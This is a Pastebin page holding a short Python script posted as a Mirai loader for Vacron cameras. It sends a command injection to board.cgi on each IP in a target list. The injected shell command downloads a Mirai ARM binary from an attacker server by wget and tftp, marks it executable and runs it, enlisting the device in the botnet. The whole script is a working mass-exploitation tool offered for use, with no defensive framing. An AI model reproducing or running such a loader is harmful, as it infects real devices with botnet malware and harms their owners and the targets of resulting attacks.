SHARE
TWEET

[VACRON CAM EXPLOIT LOADER][PYTHON][MIRAI]

xB4ckdoorREAL Nov 29th, 2018 210 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #! python !#
  2. import threading, random, socket, time, sys, requests, re, os
  3.  
  4. if len(sys.argv) < 3:
  5.     print "\033[37mUsage: python "+sys.argv[0]+" <list> <port>\033[37m"
  6.     sys.exit()
  7.  
  8. ip = "B4.CK.DO.OR" # IP for server with bins
  9. vulns = open(sys.argv[1], "r").readlines()
  10. port = int(sys.argv[2]) # ports  8080 80 81 8181
  11. class send_payload(threading.Thread):
  12.     def __init__ (self, ip):
  13.         threading.Thread.__init__(self)
  14.         self.ip = str(ip).rstrip('\n')
  15.     def run(self):
  16.         try:
  17.             url = "http://" + self.ip + "/board.cgi?cmd=" "cd+/tmp;+wget+http://" + ip + "/BINS/mirai.arm7+-O+-+>+mirai.arm7;+chmod+777+mirai.arm7;+./mirai.arm7+vacron;+tftp+-g+-l+mirai.arm7+-r+mirai.arm7+" + ip + ";+chmod+777+mirai.arm7;+./mirai.arm7+vacron"
  18.             requests.get(url, timeout=8)
  19.             print "PAYLOAD SENT: %s"%(self.ip)
  20.         except:
  21.             pass
  22.  
  23. for IP in vulns:
  24.     try:
  25.         ip = "".join(IP)
  26.         ip = ip.replace("\n", "")
  27.         t = send_payload(ip)
  28.         t.start()
  29.         time.sleep(0.03)
  30.     except:
  31.         pass
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top